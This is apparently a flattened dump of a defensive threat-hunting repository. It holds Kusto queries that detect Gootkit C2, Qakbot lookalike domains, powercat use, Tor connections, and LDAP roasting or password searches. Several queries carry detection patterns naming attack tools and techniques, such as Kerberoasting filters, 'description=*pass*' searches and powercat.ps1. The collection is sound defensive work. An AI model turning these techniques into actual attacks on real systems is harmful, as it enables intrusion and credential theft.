    | project DeviceName, MailLinkTime=Timestamp,
        MailLink=iff(WasOutlookSafeLink, url_decode(tostring(parse_url(RemoteUrl)["Query Parameters"]["url"])), RemoteUrl)
    | join kind=inner smartscreenAppWarnings on DeviceName
    | where (WarnTime-MailLinkTime) between (0min..4min);
// Add the browser download event to tie in all the dots
DeviceFileEvents
| where isnotempty(FileOriginUrl) and InitiatingProcessFileName in~ ("chrome.exe", "browser_broker.exe")
| project FileName, FileOriginUrl, FileOriginReferrerUrl, DeviceName, Timestamp, SHA1
| join kind=inner emailLinksNearSmartScreenWarnings on DeviceName
| where (Timestamp-MailLinkTime) between (0min..3min) and (WarnTime-Timestamp) between (0min..1min)
| project FileName, MailLink, FileOriginUrl, FileOriginReferrerUrl, WarnedFileName, DeviceName, SHA1, WarnedSHA1, Timestamp
| distinct *

================================================
FILE: Delivery/Gootkit-malware.md
================================================
# Gootkit malware delivery and C2

This query was originally published on Twitter, by [@MsftSecIntel](https://twitter.com/MsftSecIntel).

Gootkit is malware that started life as a banking trojan, and has since extended its capabilities to allow for a variety of malicious activities. The query helps find events related to Gootkit downloads and command-and-control behavior.

## Query

```Kusto
AlertInfo
| where Title =~ "Suspected delivery of Gootkit malware"
// The section below surfaces active follow-on command and control resulting from the above behavior.
// Comment out the joins below to see only file create events where the malware may be present but has not yet been executed.
////
// Get alert evidence
| join AlertEvidence on $left.AlertId == $right.AlertId
// Look for C2
| join DeviceNetworkEvents on $left.DeviceId == $right.DeviceId
| where InitiatingProcessFileName =~ "wscript.exe" and InitiatingProcessCommandLine has ".zip" and InitiatingProcessCommandLine has ".js"
| summarize by RemoteUrl, RemoteIP, DeviceId, InitiatingProcessCommandLine, Timestamp, InitiatingProcessFileName, AlertId, Title, AccountName
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Delivery/Open email link.txt
================================================
// Query for links opened from mail apps – if a detection occurred right afterwards.
// As there are many links opened from mails, to have a successful hunt we should have some filter or join with some other signal,
// such as suspicious processes, network connections, etc.
// Therefore, in this example, we query for alerts that might be related to links sent via email.
// This could be indicative of a phishing or spear-phishing attack.
// Tags: #EmailLink, #Phishing, #GetNearbyAlerts
// Explaining the underlying data:
// This query uses the BrowserLaunchedToOpenUrl event, which includes clicks on http:// or https:// links (clicks outside of browsers), or on .lnk files.
// For this event, RemoteUrl contains the opened URL.
let minTimeRange = ago(7d);
let outlookLinks =
    DeviceEvents
    // Filter on clicks on links from Outlook
    | where Timestamp > minTimeRange and ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl)
    | where
        // outlook.exe is the Office Outlook app
        InitiatingProcessFileName =~ "outlook.exe"
        // RuntimeBroker.exe opens links for all apps from the Windows Store, including the Windows Mail app (HxOutlook.exe).
        // However, it will also include some links opened from other apps.
        or InitiatingProcessFileName =~ "runtimebroker.exe"
    | project Timestamp, DeviceId, DeviceName, RemoteUrl, InitiatingProcessFileName, ParsedUrl=parse_url(RemoteUrl)
    // When applicable, parse the link sent via email from the clicked O365 ATP SafeLink
    | extend WasOutlookSafeLink=(tostring(ParsedUrl.Host) endswith "safelinks.protection.outlook.com")
    | project Timestamp, DeviceId, DeviceName, WasOutlookSafeLink, InitiatingProcessFileName,
        OpenedLink=iff(WasOutlookSafeLink, url_decode(tostring(ParsedUrl["Query Parameters"]["url"])), RemoteUrl);
let alerts =
    DeviceAlertEvents
    | summarize (FirstDetectedActivity, Title)=argmin(Timestamp, Title) by AlertId, DeviceId
    // Filter alerts that include events from before the queried time period
    | where FirstDetectedActivity > minTimeRange;
// Join the two together - looking for alerts whose first activity is right after a link was opened from a mail app
alerts
| join kind=inner (outlookLinks) on DeviceId
| where FirstDetectedActivity - Timestamp between (0min..3min)
// If there are multiple alerts close to a single click-on-link, aggregate them together to a single row
// Note: bin(Timestamp, 1tick) is used because when summarizing by a datetime field, the default "bin" used is 1-hour.
| summarize FirstDetectedActivity=min(FirstDetectedActivity), AlertTitles=makeset(Title)
    by OpenedLink, InitiatingProcessFileName, Timestamp=bin(Timestamp, 1tick), DeviceName, DeviceId, WasOutlookSafeLink

// Query for links opened from mail apps – if a detection occurred right afterwards. - MTP Schema
// (The same hunt as above, using the Microsoft Threat Protection AlertInfo/AlertEvidence tables instead of DeviceAlertEvents.)
// As there are many links opened from mails, to have a successful hunt we should have some filter or join with some other signal,
// such as suspicious processes, network connections, etc.
// Therefore, in this example, we query for alerts that might be related to links sent via email.
// This could be indicative of a phishing or spear-phishing attack.
// Tags: #EmailLink, #Phishing, #GetNearbyAlerts
// Explaining the underlying data:
// This query uses the BrowserLaunchedToOpenUrl event, which includes clicks on http:// or https:// links (clicks outside of browsers), or on .lnk files.
// For this event, RemoteUrl contains the opened URL.
let minTimeRange = ago(7d);
let outlookLinks =
    DeviceEvents
    // Filter on clicks on links from Outlook
    | where Timestamp > minTimeRange and ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl)
    | where
        // outlook.exe is the Office Outlook app
        InitiatingProcessFileName =~ "outlook.exe"
        // RuntimeBroker.exe opens links for all apps from the Windows Store, including the Windows Mail app (HxOutlook.exe).
        // However, it will also include some links opened from other apps.
        or InitiatingProcessFileName =~ "runtimebroker.exe"
    | project Timestamp, DeviceId, DeviceName, RemoteUrl, InitiatingProcessFileName, ParsedUrl=parse_url(RemoteUrl)
    // When applicable, parse the link sent via email from the clicked O365 ATP SafeLink
    | extend WasOutlookSafeLink=(tostring(ParsedUrl.Host) endswith "safelinks.protection.outlook.com")
    | project Timestamp, DeviceId, DeviceName, WasOutlookSafeLink, InitiatingProcessFileName,
        OpenedLink=iff(WasOutlookSafeLink, url_decode(tostring(ParsedUrl["Query Parameters"]["url"])), RemoteUrl);
let alerts =
    AlertInfo
    | join AlertEvidence on AlertId
    | summarize (FirstDetectedActivity, Title)=argmin(Timestamp, Title) by AlertId, DeviceId
    // Filter alerts that include events from before the queried time period
    | where FirstDetectedActivity > minTimeRange;
// Join the two together - looking for alerts whose first activity is right after a link was opened from a mail app
alerts
| join kind=inner (outlookLinks) on DeviceId
| where FirstDetectedActivity - Timestamp between (0min..3min)
// If there are multiple alerts close to a single click-on-link, aggregate them together to a single row
// Note: bin(Timestamp, 1tick) is used because when summarizing by a datetime field, the default "bin" used is 1-hour.
| summarize FirstDetectedActivity=min(FirstDetectedActivity), AlertTitles=makeset(Title)
    by OpenedLink, InitiatingProcessFileName, Timestamp=bin(Timestamp, 1tick), DeviceName, DeviceId, WasOutlookSafeLink

================================================
FILE: Delivery/Pivot from detections to related downloads.txt
================================================
// Pivot from downloads detected by Windows Defender Antivirus to other files downloaded from the same sites
// To learn more about the download URL info that is available and see other sample queries,
// check out this blog post: https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-Browser-downloads/td-p/220454
let detectedDownloads =
    DeviceEvents
    | where ActionType == "AntivirusDetection" and isnotempty(FileOriginUrl)
    | project Timestamp, FileOriginUrl, FileName, DeviceId,
        ThreatName=tostring(parse_json(AdditionalFields).ThreatName)
    // Filter out less severe threat categories on which we do not want to pivot
    | where ThreatName !startswith "PUA"
        and ThreatName !startswith "SoftwareBundler:"
        and FileOriginUrl != "about:internet";
let detectedDownloadsSummary =
    detectedDownloads
    // Get a few examples for each detected host:
    // up to 4 filenames, up to 4 threat names, one full URL
    | summarize DetectedUrl=any(FileOriginUrl), DetectedFiles=makeset(FileName, 4), ThreatNames=makeset(ThreatName, 4)
        by Host=tostring(parse_url(FileOriginUrl).Host);
// Query for downloads from sites from which other downloads were detected by Windows Defender Antivirus
DeviceFileEvents
| where isnotempty(FileOriginUrl)
| project FileName, FileOriginUrl, DeviceId, Timestamp, Host=tostring(parse_url(FileOriginUrl).Host), SHA1
// Filter downloads from hosts serving detected files
| join kind=inner(detectedDownloadsSummary) on Host
// Filter out download file create events that were also detected.
// This is needed because sometimes both of these events will be reported,
// and sometimes only the AntivirusDetection event - depending on timing.
| join kind=leftanti(detectedDownloads) on DeviceId, FileOriginUrl
// Summarize a single row per host - with the machine count
// and an example event for a missed download (select the last event)
| summarize MachineCount=dcount(DeviceId), arg_max(Timestamp, *) by Host
// Filter out common hosts, as they are probably ones that also serve benign files
| where MachineCount < 20
| project Host, MachineCount, DeviceId, FileName, DetectedFiles, FileOriginUrl, DetectedUrl, ThreatNames, Timestamp, SHA1
| order by MachineCount desc

================================================
FILE: Delivery/Qakbot Craigslist Domains.md
================================================
# Qakbot Craigslist Domains

Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is instructed to manually type into the address bar to access.

## Query

This query looks for network connections to domains impersonating Craigslist which are associated with the delivery of Qakbot.

```
DeviceNetworkEvents
| where RemoteUrl matches regex @"abuse\.[a-zA-Z]\d{2}-craigslist\.org"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Delivery/detect-jscript-file-creation.md
================================================
# Detect .jse file creation events

This query was originally published in the threat analytics report, *Emulation-evading JavaScripts*.

Attackers in several ransomware campaigns have employed heavily obfuscated JavaScript code, in order to implant malware or execute malicious commands. The obfuscation is intended to help the code evade security systems and potentially escape sandbox environments.

The following query detects the creation of files with a *.jse* extension. Certain ransomware campaigns, such as [Emotet](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/), are known to employ encrypted JavaScript code that is saved to the target as *.jse* files.

See [Detect potentially malicious .jse launch by File Explorer or Word](../Execution/jse-launched-by-word.md) for a similar technique.

## Query

```Kusto
// Creation of any .jse file, including legitimate and malicious ones
DeviceFileEvents
| where Timestamp > ago(7d)
| where FileName endswith ".jse"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Delivery/powercat-download.md
================================================
# Powercat exploitation tool downloaded

This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild".

In early March 2021, Microsoft released [patches](https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/) for four different zero-day vulnerabilities affecting Microsoft Exchange Server. The vulnerabilities were being used in a coordinated attack. For more information on the vulnerabilities, visit the following links:

* [CVE-2021-26855](https://nvd.nist.gov/vuln/detail/CVE-2021-26855)
* [CVE-2021-26857](https://nvd.nist.gov/vuln/detail/CVE-2021-26857)
* [CVE-2021-26858](https://nvd.nist.gov/vuln/detail/CVE-2021-26858)
* [CVE-2021-27065](https://nvd.nist.gov/vuln/detail/CVE-2021-27065)

The following query looks for *powercat*, a netcat-like networking tool written in PowerShell, being invoked from cmd.exe, powershell.exe or PowerShell_ISE.exe. Although associated with these zero-day attacks, powercat is a multi-purpose tool that is also used by other groups of attackers.

More queries related to this threat can be found under the [See also](#See-also) section of this page.
## Query

```Kusto
DeviceProcessEvents
| where FileName has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe")
// endswith only matches when the script name is the last thing on the command line;
// use ProcessCommandLine has "powercat.ps1" to also catch invocations that pass arguments after it.
| where ProcessCommandLine endswith "powercat.ps1"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |

## See also

* [Reverse shell loaded using Nishang Invoke-PowerShellTcpOneLine technique](../Execution/reverse-shell-nishang.md)
* [Procdump dumping LSASS credentials](../Credential%20Access/procdump-lsass-credentials.md)
* [7-ZIP used by attackers to prepare data for exfiltration](../Exfiltration/7-zip-prep-for-exfiltration.md)
* [Exchange PowerShell snap-in being loaded](../Exfiltration/exchange-powershell-snapin-loaded.md)
* [Exchange vulnerability creating web shells via UMWorkerProcess](../Execution/umworkerprocess-creating-webshell.md)
* [Exchange Server IIS dropping web shells and other artifacts](../Execution/exchange-iis-worker-dropping-webshell.md)
* [Exchange vulnerability launching subprocesses through UMWorkerProcess](../Execution/umworkerprocess-unusual-subprocess-activity.md)
* [Base64-encoded Nishang commands for loading reverse shell](../Execution/reverse-shell-nishang-base64.md)

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Discovery/Detect-Not-Active-AD-User-Accounts.md
================================================
# Detect inactive AD user accounts

Detect Active Directory service accounts that are inactive because their last logon was more than 14 days ago.

Replace XXX in the `AccountName startswith "XXX"` line with the prefix that the names of your Active Directory service accounts start with.

## Query

```
IdentityLogonEvents
| where AccountName startswith "XXX"
// Most recent logon per account, together with the device and logon type of that logon.
// Summarizing per DeviceName as well would report an account as inactive on every device it has not used recently,
// even when it is active elsewhere.
| summarize arg_max(Timestamp, DeviceName, LogonType) by AccountName
| project AccountName, LastLogon=Timestamp, DeviceName, LogonType
| where LastLogon < ago(14d)
// Note: accounts with no logon at all inside the advanced hunting retention period produce no rows here and are therefore not listed.
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Milad Aslaner

**GitHub alias:** https://github.com/MiladMSFT

**Organization:** Microsoft

**Contact info:** Twitter: MiladMSFT

================================================
FILE: Discovery/DetectTorRelayConnectivity.md
================================================
# Detect Tor Relay Connectivity

This advanced hunting query detects processes communicating with known Tor relay IP addresses. The public URL in the query is updated daily at 12PM and 12AM UTC.
CSV source is the Tor Project API, obtained with: https://github.com/Dylan-J/Tor-Project-Statistics

## Query

```
let TorRelayData = (
    externaldata (Nickname:string, Fingerprint:string, EntryAddress:string, IPv4Address:string, IPv4Port:string, IPv6Address:string, AddressType:string, Hostname:string, CountryCode:string, IsRunning:bool, RelayPublishDate:string, LastChangedIPData:string)
    [h@'https://msde.blob.core.windows.net/public/TorRelayIPs.csv']
    with (ignoreFirstRecord=true, format="csv")
    | where AddressType == "IPv4"
);
TorRelayData
| join kind=inner DeviceNetworkEvents on $left.IPv4Address == $right.RemoteIP
// DeviceInfo may hold more than one PublicIP per device over time; each such value produces its own copy of the matching rows
| join kind=inner (DeviceInfo | distinct DeviceId, PublicIP) on DeviceId
| project Timestamp, DeviceId, LocalPublicIP = PublicIP, LocalIP, RemoteIP, TorIP = IPv4Address, Hostname, CountryCode, ActionType, InitiatingProcessFileName, InitiatingProcessFolderPath
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Dylan Jones

**GitHub alias:** Dylan-J

**Organization:** Microsoft

**Contact info:** Twitter - @dylface2

================================================
FILE: Discovery/DetectTorrentUse.txt
================================================
// Custom detection to find use of torrenting software or browsing related to torrents
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "torrent"
    or RemoteUrl has "vuze"
    or RemoteUrl has "azureus"
    or RemoteUrl endswith ".tor"
    or InitiatingProcessFileName has "torrent"
    or InitiatingProcessFileName has "vuze"
    or InitiatingProcessFileName contains "azureus"
| project Timestamp, ReportId, DeviceId, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort

================================================
FILE: Discovery/Discover hosts doing possible network scans.txt
================================================
// Looking for hosts that contact many distinct remote ports on a single RemoteIP, per DeviceName and initiating process
// Change the Timestamp window according to your preference/objective, as well as the subnet ranges that you want to analyze
let remotePortCountThreshold = 10; // Change this to the minimum number of distinct remote ports on one remote IP that you consider suspicious for a single host
DeviceNetworkEvents
// Note the parentheses: "and" binds tighter than "or", so without them the 192.168 branch would ignore the time filter.
// startswith "172.16" covers only 172.16.x.x (and would also match e.g. 172.160.x.x); ipv4_is_in_range(RemoteIP, "172.16.0.0/12") is the precise test.
| where Timestamp > ago(1d)
    and (RemoteIP startswith "172.16" or RemoteIP startswith "192.168")
| summarize by DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName
| summarize RemotePortCount=dcount(RemotePort) by DeviceName, RemoteIP, InitiatingProcessFileName
| where RemotePortCount > remotePortCountThreshold

================================================
FILE: Discovery/Enumeration of users & groups for lateral movement.txt
================================================
// The query finds attempts to list users or groups using Net commands
DeviceProcessEvents
| where Timestamp > ago(14d)
| where FileName =~ 'net.exe' and AccountName != "" and ProcessCommandLine !contains '\\' and ProcessCommandLine !contains '/add'
| where (ProcessCommandLine contains ' user ' or ProcessCommandLine contains ' group ')
    and (ProcessCommandLine contains ' /do' or ProcessCommandLine contains ' /domain')
// Capture the name that follows the word "user" or "group" (quoted names such as "Domain Admins" included)
| extend Target = extract(@'(?i)\b(?:user|group) ("*[a-zA-Z0-9_ -]+"*)', 1, ProcessCommandLine)
| where Target != ''
| project AccountName, Target, ProcessCommandLine, DeviceName, Timestamp
| sort by AccountName, Target

================================================
FILE: Discovery/MultipleLdaps.md
================================================
# Detect multiple LDAP queries

Detect multiple Active Directory LDAP queries made within one bin of time.

Replace 10 on line 1 with your desired threshold. Replace 1m on line 2 with your desired bin time.

## Query

```
let Threshold = 10;
let BinTime = 1m;
IdentityQueryEvents
| where ActionType == "LDAP query"
| parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter
| summarize NumberOfLdapQueries = count(), NumberOfDistinctLdapQueries = dcount(SearchFilter) by DeviceName, bin(Timestamp, BinTime)
| where NumberOfDistinctLdapQueries > Threshold
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributors info

**Contributor:** Mor Rubin

**GitHub alias:** https://github.com/morRubin

**Organization:** Microsoft

**Contact info:** Twitter: MorRubin

**Contributor:** Oz Soprin

**GitHub alias:** https://github.com/ozSoprin

**Organization:** Microsoft

**Contact info:** Twitter: ozSoprin

================================================
FILE: Discovery/MultipleSensitiveLdaps.md
================================================
# Detect multiple sensitive LDAP queries

Detect multiple sensitive Active Directory LDAP queries made within one bin of time. Sensitive queries are defined as roasting queries or queries for sensitive objects.

Replace 10 on line 6 with your desired threshold. Replace 1m on line 7 with your desired bin time.

This query covers the Rubeus, Kerberoast and BloodHound tools.

## Query

```
let SensitiveObjects = "[\"Administrators\", \"Domain Controllers\", \"Domain Admins\", \"Account Operators\", \"Backup Operators\", \"DnsAdmin\", \"Enterprise Admins\", \"Group Policy Creator Owners\"]";
let ASREP_ROASTING = "userAccountControl:1.2.840.113556.1.4.803:=4194304";
let ASREP_ROASTING1 = "userAccountControl|4194304";
let ASREP_ROASTING2 = "userAccountControl&4194304";
let KERBEROASTING = "serviceprincipalname=*";
let Threshold = 10;
let BinTime = 1m;
let SensitiveQueries = (
    IdentityQueryEvents
    | where ActionType == "LDAP query"
    | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter
    // isnotempty() guards against an empty QueryTarget matching the list
    | where (isnotempty(QueryTarget) and SensitiveObjects contains QueryTarget) or SearchFilter contains "admincount=1");
let Roasting = (
    IdentityQueryEvents
    | where ActionType == "LDAP query"
    | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter
    | where SearchFilter contains ASREP_ROASTING
        or SearchFilter contains ASREP_ROASTING1
        or SearchFilter contains ASREP_ROASTING2
        or SearchFilter contains KERBEROASTING);
union SensitiveQueries, Roasting
| summarize NumberOfLdapQueries = count(), NumberOfDistinctLdapQueries = dcount(SearchFilter) by DeviceName, bin(Timestamp, BinTime)
| where NumberOfDistinctLdapQueries > Threshold
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributors info

**Contributor:** Mor Rubin

**GitHub alias:** https://github.com/morRubin

**Organization:** Microsoft

**Contact info:** Twitter: MorRubin

**Contributor:** Oz Soprin

**GitHub alias:** https://github.com/ozSoprin

**Organization:** Microsoft

**Contact info:** Twitter: ozSoprin

================================================
FILE: Discovery/PasswordSearch.md
================================================
# Detect LDAP queries that search for user passwords in description or comment

Detect Active Directory LDAP queries that search for users whose comment or description contains the string "pass", which may indicate a password stored in the user's attributes.

This query covers the Metasploit enum_ad_user_comments module.

## Query

```
let PersonObject = "objectCategory=person";
let UserClass = "objectClass=user";
let SamAccountUser = "samAccountType=805306368";
let Description = "description=*pass*";
let Comment = "comment=*pass*";
IdentityQueryEvents
| where ActionType == "LDAP query"
| parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter
| where (SearchFilter contains Description or SearchFilter contains Comment)
    and (SearchFilter contains PersonObject or SearchFilter contains UserClass or SearchFilter contains SamAccountUser)
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributors info

**Contributor:** Mor Rubin

**GitHub alias:** https://github.com/morRubin

**Organization:** Microsoft

**Contact info:** Twitter: MorRubin

**Contributor:** Oz Soprin

**GitHub alias:** https://github.com/ozSoprin

**Organization:** Microsoft

**Contact info:** Twitter: ozSoprin

================================================
FILE: Discovery/PrevalentInteractiveLogons
================================================
// Breaks down the top interactive logged-on user for each machine.
// you can look for a specific user by using the line in comment of where AccountName DeviceLogonEvents //| where AccountName == "YOUR ACCOUNT" | where LogonType in ("Interactive","CachedInteractive") and ActionType == "LogonSuccess" | extend parsed = parse_json(AdditionalFields) | extend Localcheck = tostring(parsed.IsLocalLogon) | where Localcheck notcontains "false" | summarize timesloggedon=count() by DeviceName, AccountName | summarize arg_max(timesloggedon,*) by DeviceName ================================================ FILE: Discovery/Roasting.md ================================================ # Detect LDAP queries that search for accounts vulnerable for roasting attacks Detect Active Directory LDAP queries that search for Kerberoasting (SPNs) or accounts with Kerberos preauthentication not required from Azure ATP, and try to get the process initiated the LDAP query from MDATP. Replace 389 on line 5 with LDAP port in your environment Replace true on line 6 to false if you want to include Nt Authority process This LDAP query cover Rubeus, Kerberoast, BloodHound tools ## Query ``` let ASREP_ROASTING = "userAccountControl:1.2.840.113556.1.4.803:=4194304"; let ASREP_ROASTING1 = "userAccountControl|4194304"; let ASREP_ROASTING2 = "userAccountControl&4194304"; let KERBEROASTING = "serviceprincipalname=*"; let LDAP_PORT = 389; let ExcludeNtAuthorityProcess = true; let AzureAtpLdap = ( IdentityQueryEvents | where ActionType == "LDAP query" | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter | where SearchFilter contains ASREP_ROASTING or SearchFilter contains ASREP_ROASTING1 or SearchFilter contains ASREP_ROASTING2 or SearchFilter contains KERBEROASTING | extend Time = bin(Timestamp, 1s) | extend DeviceNameWithoutDomain = tolower(tostring(split(DeviceName, '.')[0]))); let MDAtpNetworkToProcess = ( DeviceNetworkEvents | extend DeviceNameWithoutDomain = tolower(tostring(split(DeviceName, '.')[0])) | where 
RemotePort == LDAP_PORT | extend Time = bin(Timestamp, 1s) | extend isExclude = iff( ExcludeNtAuthorityProcess and InitiatingProcessAccountDomain == "nt authority" , true, false)); AzureAtpLdap | join kind=leftouter ( MDAtpNetworkToProcess ) on DeviceNameWithoutDomain, Time | where isExclude == false or isnull(isExclude) ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | X | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributors info **Contributor:** Mor Rubin **GitHub alias:** https://github.com/morRubin **Organization:** Microsoft **Contact info:** Twitter: MorRubin **Contributor:** Oz Soprin **GitHub alias:** https://github.com/ozSoprin **Organization:** Microsoft **Contact info:** Twitter: ozSoprin ================================================ FILE: Discovery/SMB shares discovery.txt ================================================ // Query for processes that accessed more than 10 IP addresses over port 445 (SMB) - possibly scanning for network shares. 
// To read more about Network Share Discovery, see: https://attack.mitre.org/wiki/Technique/T1135
// Tags: #SMB, #NetworkScanning, #UniqueProcessId
DeviceNetworkEvents
| where RemotePort == 445 and Timestamp > ago(7d)
    // Exclude Kernel processes, as they are too noisy in this query
    and InitiatingProcessId !in (0, 4)
| summarize RemoteIPCount=dcount(RemoteIP) by DeviceName, InitiatingProcessFileName, InitiatingProcessId, InitiatingProcessCreationTime
| where RemoteIPCount > 10
// Implementation comment:
// Process IDs are recycled and reused, so are not a unique identifier for a process.
// For this reason we use a combination of ProcessId and ProcessCreationTime together with the DeviceName or DeviceId.
// Read more here: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/advanced-hunting-best-practices-windows-defender-advanced-threat-protection

================================================
FILE: Discovery/SensitiveLdaps.md
================================================
# Detect LDAP queries for sensitive objects

Detect Active Directory LDAP queries that search for sensitive objects in the organization.

This LDAP query covers the BloodHound tool.

## Query

```
let SensitiveObjects = "[\"Administrators\", \"Domain Controllers\", \"Domain Admins\", \"Account Operators\", \"Backup Operators\", \"DnsAdmin\", \"Enterprise Admins\", \"Group Policy Creator Owners\"]";
IdentityQueryEvents
| where ActionType == "LDAP query"
| parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter
| where SensitiveObjects contains QueryTarget or SearchFilter contains "admincount=1"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | X | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributors info

**Contributor:** Mor Rubin

**GitHub alias:** https://github.com/morRubin

**Organization:** Microsoft

**Contact info:** Twitter: MorRubin

**Contributor:** Oz Soprin

**GitHub alias:** https://github.com/ozSoprin

**Organization:** Microsoft

**Contact info:** Twitter: ozSoprin

================================================
